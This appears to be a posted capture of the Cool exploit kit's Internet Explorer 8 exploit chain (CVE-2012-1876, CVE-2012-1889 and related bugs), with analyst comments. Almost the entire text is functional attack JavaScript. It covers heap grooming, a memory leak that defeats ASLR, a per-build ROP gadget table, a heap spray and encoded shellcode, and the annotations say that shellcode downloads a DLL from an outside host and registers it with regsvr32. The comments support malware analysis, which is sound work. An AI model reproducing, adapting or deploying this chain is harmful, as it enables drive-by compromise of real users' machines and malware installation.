Kafeine

Cool EK — CVE-2012-1876, CVE-2012-1889 & CVE-2012-4792 (Internet Explorer 8 exploit chain, as captured; annotated for analysis)

Jan 25th, 2013
  1. <script type='text/javascript'>
// Namespace object for the IE heap-manipulation helpers that follow; only the
// `heapLib.ie` constructor is attached to it. The names mirror the public
// "heapLib" technique, but this is a cut-down variant, not the library itself.
function heapLib() {}
// Constructor: builds the padding string used to fill IE heap bins, creates the
// two retention bins ("0" for padding, "1" for sprayed strings), forces a GC and
// primes the bins via hlFillbins().
// NOTE(review): the `m` argument is never stored and `this.m` is never assigned,
// so the `while` condition compares against undefined and is always false; `pd`
// stays the literal 12-character "%u0c0c%u0c0c". It is also never passed through
// unescape(), so it is raw percent-text, not 0x0c0c code units. Documented, not
// fixed: this is the sample as captured.
heapLib.ie = function(m) {
  this.pd = "%u0c0c%u0c0c";
  while (4 + this.pd.length*2 + 2 < this.m) {
    this.pd += this.pd;
  }
  // String keys on an Array are just plain properties here.
  this.me = new Array();
  this.me["0"] = new Array();
  this.me["1"] = new Array();
  CollectGarbage();

  this.hlFillbins();
};
  15.  
// Pushes six rounds of padding strings into bin "0". The "(N-6)/2" arithmetic
// encodes the intended allocation size: a string of that many UTF-16 units plus
// ~6 bytes of header/terminator should land in an N-byte heap chunk (32, 64,
// 256 and 32768 bytes).
// NOTE(review): `this.pd` is only 12 code units long (see the constructor), and
// every requested length here is >= 13, so each substr() returns the whole
// 12-unit string; the intended chunk sizes are not actually produced.
heapLib.ie.prototype.hlFillbins = function() {
  for (var i = 0; i < 6; i++) {
    this.me["0"].push(this.pd.substr(0, (32-6)/2));
    this.me["0"].push(this.pd.substr(0, (64-6)/2));
    this.me["0"].push(this.pd.substr(0, (256-6)/2));
    this.me["0"].push(this.pd.substr(0, (32768-6)/2));
  }
};
  24.  
// "Allocates" by retaining a copy of string `a` in bin "1" so it stays live on
// the heap; non-string arguments are silently ignored. Returns undefined, so a
// caller that stores the return value (sprayContaner in heap_spray) only holds
// undefined — the live reference is the one kept in this.me["1"].
heapLib.ie.prototype.heapLib_alloc = function(a) {
  if (typeof a == "string" || a instanceof String) {
    this.me["1"].push(a.substr(0, a.length));
  }
};
  30.  
// Drops bin "0", forces IE's garbage collector and refills the bins so freshly
// freed chunks are reclaimed by padding. Not called anywhere in this script.
heapLib.ie.prototype.heapLib_GC = function() {
  delete this.me["0"];
  this.me["0"] = new Array();
  CollectGarbage();
  this.hlFillbins();
};
  37.  
// Releases both bins and forces a collection. Not called anywhere in this script.
heapLib.ie.prototype.heapLib_release = function() {
  delete this.me["1"];
  delete this.me["0"];
  CollectGarbage();
};
  43.  
// Single heap helper instance. 0x20000 is passed as the size bound `m`, but the
// constructor never stores it (see heapLib.ie), so the value has no effect.
var heapObj = new heapLib.ie(0x20000);
  45.  
// The row of ropGadgetsTable_IE8 selected and rebased by findLeak(); read by
// heap_spray(). Stays undefined when no leak is found or no row matches.
var ropGadgets;
  47.  
// Per-build gadget offset table for IE8, one row per supported build of the
// leaked module (the module itself is not identifiable from this script; the
// leaked pointer comes from the object adjacent to a grooming string, so it is
// presumably an mshtml.dll vtable — confirm against the target binaries).
// Column meaning, as consumed by findLeak() and heap_spray():
//   [0] expected low 16 bits of the first leaked pointer
//   [1] expected low 16 bits of the second leaked pointer, or 0 = wildcard
//   [2] offset of the leaked pointer from the module base (subtracted to get
//       the base)
//   [3]..[8] gadget offsets; heap_spray() emits them in the order
//       4,5,3,4,4,5,4,5,6,7,8 after a fixed 0x105ae02c word.
// findLeak() rebases every column of the matched row in place (columns 0..2
// included), so the table is mutated after a successful match.
var ropGadgetsTable_IE8 = new Array(
  new Array(0xAE08, 0x0, 0x1FAE08, 0x2E4E3, 0x5C4B, 0x5C4A, 0x1318, 0x3F7FB, 0x25B84),
  new Array(0x80C8, 0, 0x2080C8, 0x2CE36, 0x4E65, 0x4E64, 0x1340, 0x3F3CF, 0x62B0),
  new Array(0x7A98, 0, 0x207A98, 0x2D00E, 0x4EA9, 0x4EA8, 0x137C, 0x3F54D, 0x1E924),
  new Array(0x7B58, 0, 0x207B58, 0x2D05E, 0x4EA9, 0x4EA8, 0x137C, 0x3F5ED, 0x1E914),
  new Array(0x7FC8, 0x8160, 0x207FC8, 0x2D314, 0x4EA1, 0x4EA0, 0x137C, 0x3F8F3, 0x1E9A4),
  new Array(0x7DF8, 0x7F90, 0x207DF8, 0x2D174, 0x4EA1, 0x4EA0, 0x137C, 0x3F703, 0x1E804),
  new Array(0x7DF8, 0x7F98, 0x207DF8, 0x2D20C, 0x4EC1, 0x4EC0, 0x1368, 0x3F677, 0x1E844),
  new Array(0x7DD8, 0x0, 0x207DD8, 0x176C, 0x4ED9, 0x4ED8, 0x1374, 0x3F6D7, 0x13739),
  new Array(0x7EF8, 0x8090, 0x207EF8, 0x2CDD6, 0x4E65, 0x4E64, 0x1340, 0x3F39F, 0x1E844),
  new Array(0x7BB8, 0x7D58, 0x207BB8, 0x2D170, 0x4EA1, 0x4EA0, 0x1368, 0x3F5F7, 0x1E7E4),
  new Array(0x7F58, 0x80F8, 0x207F58, 0x2D190, 0x4EA1, 0x4EA0, 0x1368, 0x3F637, 0x91C5F),
  new Array(0x3AF8, 0x0, 0x173AF8, 0x117EF, 0x1148E, 0x1148D, 0x1308, 0x9F5C9, 0x2D7FE),
  new Array(0x3930, 0x3AC8, 0x173930, 0x118FF, 0x1159E, 0x1159D, 0x134C, 0x9F4D1, 0x2D83E),
  new Array(0x3A70, 0x3C10, 0x173A70, 0x1191B, 0x115BA, 0x115B9, 0x133C, 0x9F661, 0x2D8DE),
  new Array(0x8668, 0x8800, 0x158668, 0x1B44B, 0x14F08, 0x14F07, 0x1348, 0x6F0EB, 0x2CCAE),
  new Array(0x8628, 0x87C0, 0x158628, 0x1B4EF, 0x14FA8, 0x14FA7, 0x134C, 0x6F1DB, 0x2CDEE),
  new Array(0x8528, 0x86C0, 0x158528, 0x1B4EF, 0x14FA8, 0x14FA7, 0x134C, 0x6F0DB, 0x2CDAE),
  new Array(0x82D8, 0x8478, 0x1582D8, 0x1B4E3, 0x14F88, 0x14F87, 0x133C, 0x6EFC3, 0x2CD96)
);
  68.  
// Grooming array: groups of [string, string, string, <button>] filled by
// LoadIeColSpan() and scanned by findLeak() for a string whose length grew.
var fillbuff = new Array();
  70.  
// Returns a string of exactly `s` UTF-16 code units: prefix `p` followed by a
// repeating two-unit random pattern. If `p` is already `s` units or longer the
// result is just `p` (the substr length goes non-positive and yields "").
// Each random unit is built from two random two-digit decimal numbers (10..99)
// glued into one %uXXXX escape; decimal digits are valid hex, so unescape()
// always yields a code unit in 0x1010..0x9999. Not cryptographic randomness —
// it only needs to vary the filler contents.
function randString(p, s)
{
  var twoDigits = function() {
    return Math.floor(Math.random()*90) + 10;
  };

  var escapes = "%u" + twoDigits().toString() + twoDigits().toString();
  escapes += "%u" + twoDigits().toString() + twoDigits().toString();

  var filler = unescape(escapes);

  // Double until long enough, then trim to the remaining room after `p`.
  while (filler.length < s) {
    filler += filler;
  }

  return p + filler.substr(0, s - p.length);
}
// Stage 1: heap grooming plus the <col> set-up. Requires elements with ids
// "heap_allign" and "table_div" to exist in the hosting page (not shown here;
// getElementById returning null would throw on the next line).
// Fills fillbuff with groups of three 125-unit random strings and one <button>
// appended to a hidden div (so each button is a live element between the
// strings), then frees the first string of every group and forces GC, leaving
// holes. It then builds a fixed-layout <table> with a <colgroup>/<col> of
// width 41 and span 9 — the element that overwrite() enlarges 500 ms later.
// The page title attributes this to CVE-2012-1876 (the <col> element
// vulnerability); that attribution is not re-derivable from the script alone.
function LoadIeColSpan() {
  var div_container = document.getElementById("heap_allign");
  div_container.style.cssText = "display:none";
  // Do this as a single piece (original comment was transliterated Russian).
  for (var i = 0; i < 4000; i += 4) {
    fillbuff[i] = randString('', 125);
    fillbuff[i+1] = randString('', 125);
    fillbuff[i+2] = randString('', 125);
    fillbuff[i+3] = document.createElement("button");
    div_container.appendChild(fillbuff[i+3]);
  }

  // Free only index 0 of each group; indices 1 and 2 stay live and are the
  // strings findLeak() later inspects for a corrupted length.
  for (var i = 0; i < 4000; i += 4) {
    fillbuff[i] = null;
  }
  CollectGarbage();
  // End of the single-piece section.
  var oForTable = document.getElementById("table_div");
  oForTable.width = "51px";
  oForTable.style.width = "51px";
  oForTable.style.height = "1px";
  oForTable.style.overflow = "auto";

  var oTable = document.createElement("table");
  oTable.style.tableLayout = "fixed";
  oTable.style.visibility = "visible";
  oTable.width = "51";
  oTable.height = "1";
  oForTable.appendChild(oTable);

  var oRow = oTable.insertRow();


  var oColGroup = document.createElement("COLGROUP");
  oColGroup.width = "1px";
  oTable.appendChild(oColGroup);

  // Initial span/width; overwrite() later changes these to 19 / 42765.
  var oCol = document.createElement("COL");
  oCol.id = "table_col_id";
  oCol.width = "41";
  oCol.height = "1";
  oCol.span = "9";

  oColGroup.appendChild(oCol);

  var oCell = oRow.insertCell();
  oCell.innerHTML = " ";
  // Created but never attached to the table.
  var oTbody = document.createElement("TBODY");

  CollectGarbage();

  // Let layout settle before changing the column attributes.
  setTimeout(function(){overwrite()}, 500);
}
  141.  
// Receives the return values of heapLib_alloc(), which are always undefined;
// effectively unused. The sprayed strings are actually held in heapObj.me["1"].
var sprayContaner = new Array();
  143.  
// Encodes a 32-bit value as two UTF-16 code units, low half first, so that the
// string's in-memory bytes are the little-endian representation of `k`.
// `k >> 16` is an arithmetic shift; String.fromCharCode truncates each argument
// to 16 bits, so values with the top bit set still encode correctly.
function toUnescape(k) {
  var lowHalf = k & 0xFFFF;
  var highHalf = k >> 16;
  return String.fromCharCode(lowHalf, highHalf);
}
  147.  
  148.  
// Stage 3: heap spray. Builds (a) 400 strings of ~1 MiB each containing a
// pivot/ROP block repeated every 4096 code units (8 KiB) and (b) 100 strings of
// ~1 MiB of shellcode, all retained through heapObj.heapLib_alloc(). `r` is
// unused. `shellcode` is assigned without `var` and therefore becomes a global.
// Block layout in bytes: [0..3] two junk units, [4..7] 0x105ae02c, then eleven
// gadget addresses from the selected row (order 4,5,3,4,4,5,4,5,6,7,8), then
// 0x105ae06c, 0x105a0000, 0x00010000, 0x00000040, 0x105ae000, then the
// egghunter and the 16-unit token. The 0x105a???? constants fall inside the
// ~500 MiB spray; the last five words look like a return address plus a
// VirtualProtect-style argument set (0x40 = PAGE_EXECUTE_READWRITE) — inferred
// from the values, not verifiable without the target module. The "nops"
// filler is 0xCC, the x86 int3 opcode, not NOPs.
// Decoding the shellcode words as little-endian bytes shows the ASCII fragments
// "urlmon", "regsvr32 -s" and an http:// URL ending in "/news/pics/new.png"
// (host appears to be under adminhrservices.org) — consistent with a
// download-and-register-DLL payload. Treat that host as a 2013 indicator only.
function heap_spray(r) {
  shellcode = unescape("%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u352f%u3031%u6232%u3735%u3833%u3639%u6137%u612e%u6d64%u6e69%u7268%u6573%u7672%u6369%u7365%u6f2e%u6772%u6e2f%u7765%u2f73%u6970%u7363%u6e2f%u7765%u702e%u676e%u0000");

  // Named "egghunter" by the author; `token` (the first 16 units of the
  // shellcode) is appended after it, presumably the marker it searches for in
  // the separately sprayed shellcode region — not verified by disassembly here.
  var eghunter = unescape("%uE485%u3575%u5FE9%uC033%u8B64%u3040%u408B%u8B0C%u1C70%u56FC%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5075%uEBE9%u514B%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%u03AD%u33C5%u0FDB%u10BE%uF238%u0874%uCBC1%u030D%u40DA%uF1EB%u1F3B%uE775%u8B5E%u245E%uDD03%u8B66%u4B0C%u468D%uFFEC%u2454%u8B0C%u03D8%u8BDD%u8B04%uC503%u5EAB%uC359%u70EB%u8BAD%u2068%u7D80%u330C%u0374%uEB96%u8BF3%u0868%uF78B%u036A%uE859%uFF99%uFFFF%uF9E2%uC033%uB866%u001C%uE02B%uDC8B%uC933%u5951%uB966%uFFFF%u8141%uFFF9%uFFFF%u777F%u515C%u1C6A%u5153%u16FF%uC085%uE774%u7B81%u0010%u0010%u7500%u81DE%u187B%u0000%u0002%uD575%u7B83%u0414%uCF75%uC933%u07B1%u038B%u448B%u2488%u548B%u0C8E%uD03B%uBD75%uF0E2%u02EB%u25EB%uC68B%uC083%u500C%u406A%u438B%u500C%u438B%u5004%u56FF%u6404%u258B%u0000%u0000%u338B%uC683%uFF24%uFFE6%u0856%uE890%uFEE1%uFFFF%uC8AA%uA3C8%uC61B%u7946%uD87E%u73E2");
  var token = shellcode.substr(0, 16);

  // ROP block: fixed lead word, gadgets from the rebased row, fixed tail words.
  var code = unescape("%ue02C%u105a");
  code += toUnescape(ropGadgets[4]);
  code += toUnescape(ropGadgets[5]);
  code += toUnescape(ropGadgets[3]);
  code += toUnescape(ropGadgets[4]);
  code += toUnescape(ropGadgets[4]);
  code += toUnescape(ropGadgets[5]);
  code += toUnescape(ropGadgets[4]);
  code += toUnescape(ropGadgets[5]);
  code += toUnescape(ropGadgets[6]);
  code += toUnescape(ropGadgets[7]);
  code += toUnescape(ropGadgets[8]);
  code += unescape("%uE06C%u105A");
  code += unescape("%u0000%u105A");
  code += unescape("%u0000%u0001");
  code += unescape("%u0040%u0000");
  code += unescape("%uE000%u105A");


  code += eghunter;
  code += token;

  // 0xCC filler (int3), grown to 4096 units.
  var nops = unescape("%uCCCC%uCCCC");


  while (nops.length < 4096) nops += nops;
  var junk_offset = nops.substring(0, 0x2);

  // One 4096-unit (8 KiB) block: 2 junk units + chain + filler.
  var block = junk_offset + code + nops.substring(0, 4096 - code.length - junk_offset.length);

  while (block.length < 100000) block += block;
  while (shellcode.length < 100000) shellcode += shellcode;

  // Each spray string is 15 x 64 KiB plus (60 KiB - 38 bytes); the 19-unit trim
  // presumably leaves room for the string header below a 1 MiB boundary —
  // not verifiable from the script.
  var f = block.substring(0, 64*1024/2);
  var a = shellcode.substring(0, 64*1024/2);

  for (i=0; i<14; i++) {
    f += block.substr(0, 64*1024/2);
  }

  f += block.substr(0, (60*1024/2)-(38/2));

  for (i=0; i<14; i++) {
    a += shellcode.substr(0, 64*1024/2);
  }

  a += shellcode.substr(0, (60*1024/2)-(38/2));

  // `i` is never declared in this function and leaks as a global.
  for (i=0; i < 400; i++) {
    sprayContaner[i] = heapObj.heapLib_alloc(f);
  }
  for (i=400; i < 500; i++) {
    sprayContaner[i] = heapObj.heapLib_alloc(a);
  }
}
  210.  
// Stage 2: enlarges the <col> created in LoadIeColSpan() from width 41 / span 9
// to width 42765 / span 19, then schedules findLeak() 500 ms later. Per the
// page title this is the CVE-2012-1876 trigger (the span change past the
// originally laid-out column count); what exactly gets written past the
// allocation is not determinable from the script — findLeak() only relies on
// a neighbouring string's length field having grown.
function overwrite() {

  var oCol = document.getElementById("table_col_id");

  if (oCol != null) {
    oCol.width = "42765";
    oCol.span = "19";
    setTimeout(function(){findLeak()}, 500);
  }

}
  222.  
// Stage 4: info leak + trigger. Scans fillbuff for a grooming string whose
// length field was corrupted by overwrite(): the strings were created with
// exactly 125 units, so `length > 125` means the string now reads past its own
// buffer into the neighbouring allocation (an out-of-bounds read). Two 32-bit
// values are pulled from it; the first is matched against ropGadgetsTable_IE8
// to select a row and recover a module base, the row is rebased, heap_spray()
// runs, and finally the MSXML object is instantiated and poked.
// Detection features visible here: the classid below, an <img src> beginning
// with "\\\\xxx", a read of `.nameProp`, and `.definition(` on the object.
function findLeak() {
  var leak_addr1 = -1;
  var leak_addr2 = -1;
  var leak_index = -1;

  // Groups are [str, str, str, <button>]; index 0 of each group was nulled in
  // LoadIeColSpan, so only indices 1 and 2 of each group are examined.
  for (var i = 1; i < 4000; i += 4)
  {
    var offset = 0;

    if (fillbuff[i].length > (0x100-6)/2)
    {
      leak_index = i;
      // Offsets are UTF-16 code units. The arithmetic skips the original
      // 125-unit body plus (2 + 8)/2 = 5 units (presumably terminator and heap
      // chunk header — not verifiable from here), then doubles and adds 2;
      // the second candidate below uses the undoubled form. Why they differ
      // is not documented in the sample.
      offset = ((0x100-6)/2 + (2 + 8)/2) * 2 + 2;
      leak_addr1 = fillbuff[leak_index].charCodeAt(offset) + (fillbuff[leak_index].charCodeAt(offset + 1) << 16);
      leak_addr2 = fillbuff[leak_index].charCodeAt(offset + 6) + (fillbuff[leak_index].charCodeAt(offset + 7) << 16);

      // 0x430043 is "CC" as two UTF-16 units — still inside string data rather
      // than an object header, so step 16 units further and re-read.
      if (leak_addr1 == 0x430043) {
        offset += 16;
        leak_addr1 = fillbuff[leak_index].charCodeAt(offset) + (fillbuff[leak_index].charCodeAt(offset + 1) << 16);
        leak_addr2 = fillbuff[leak_index].charCodeAt(offset + 6) + (fillbuff[leak_index].charCodeAt(offset + 7) << 16);
      }
    }

    // Second candidate; if both strings of the group are over-long this
    // silently replaces the values read from the first one.
    if (fillbuff[i + 1].length > (0x100-6)/2)
    {
      leak_index = i + 1;
      offset = (0x100-6)/2 + (2 + 8)/2;
      leak_addr1 = fillbuff[leak_index].charCodeAt(offset) + (fillbuff[leak_index].charCodeAt(offset + 1) << 16);
      leak_addr2 = fillbuff[leak_index].charCodeAt(offset + 6) + (fillbuff[leak_index].charCodeAt(offset + 7) << 16);
    }

    if (leak_index != -1)
    {

      // Sanity check: reject anything too low to be a user-mode module pointer.
      if (leak_addr1 < 0x100000) {
        leak_addr1 = 0;
        leak_index = -1;
        break;
      }

      // Row match: low 16 bits of the first value against column 0, and the
      // low 16 bits of the second against column 1 unless column 1 is 0.
      // NOTE: this inner loop reuses the outer loop's function-scoped `i`;
      // harmless only because the outer loop is exited unconditionally below.
      for (var i = 0; i < ropGadgetsTable_IE8.length; i++)
      {
        if (((leak_addr1 & 0xFFFF) == ropGadgetsTable_IE8[i][0]) &&
          ((ropGadgetsTable_IE8[i][1] == 0x0) ||
          ((leak_addr2 & 0xFFFF) == ropGadgetsTable_IE8[i][1])))
        {
          ropGadgets = ropGadgetsTable_IE8[i];
          // Leaked pointer minus its offset from the base = module base.
          leak_addr1 -= ropGadgets[2];
          break;
        }
      }

      if (ropGadgets == null) {
        leak_addr1 = 0;
        leak_index = -1;
      }

      break;
    }
  }


  if (leak_index != -1)
  {
    // Rebase every column of the matched row in place, including the
    // match columns 0..2 (no longer needed after selection).
    if (ropGadgets != null) {
      for (var i = 0; i < ropGadgets.length; i++) {
        ropGadgets[i] += leak_addr1;
      }
    }

    heap_spray();

    // Trigger. The CLSID is the one cited in the CVE-2012-1889 (MSXML) advisories
    // for the MSXML DOM document class — confirm against a registry export
    // before relying on that identification. `src` is "\\\\xxx" followed by the
    // word 0x105ae028 repeated, trimmed to 0x1000 - 10 units, assigned to an
    // <img> and surfaced via `nameProp`, then `definition` is accessed on the
    // control. This matches the public exploit pattern for that bug.
    var obj = document.createElement("object");
    obj.classid = "clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4";
    document.body.appendChild(obj);

    obj = obj.object;
    var src = unescape("%ue028%u105a");

    while (src.length < 0x1002) src += src;
    src = "\\\\xxx" + src;
    src = src.substr(0, 0x1000 - 10);
    var pic = document.createElement("img");
    pic.src = src;
    pic.nameProp;
    try {
      obj.definition(0);
      // `definition` as a bare identifier is declared nowhere in this script:
      // if control reaches here it throws ReferenceError, the empty catch
      // swallows it, and the final statement never executes.
      obj.definition(definition);
      obj.definition;
    } catch(e) { }

  }

}
  317.  
// Entry point. Chain: LoadIeColSpan() (groom + <col>) -> overwrite() after
// 500 ms (enlarge span/width) -> findLeak() after 500 ms (leak, rebase,
// heap_spray(), MSXML trigger).
LoadIeColSpan();
  319. </script>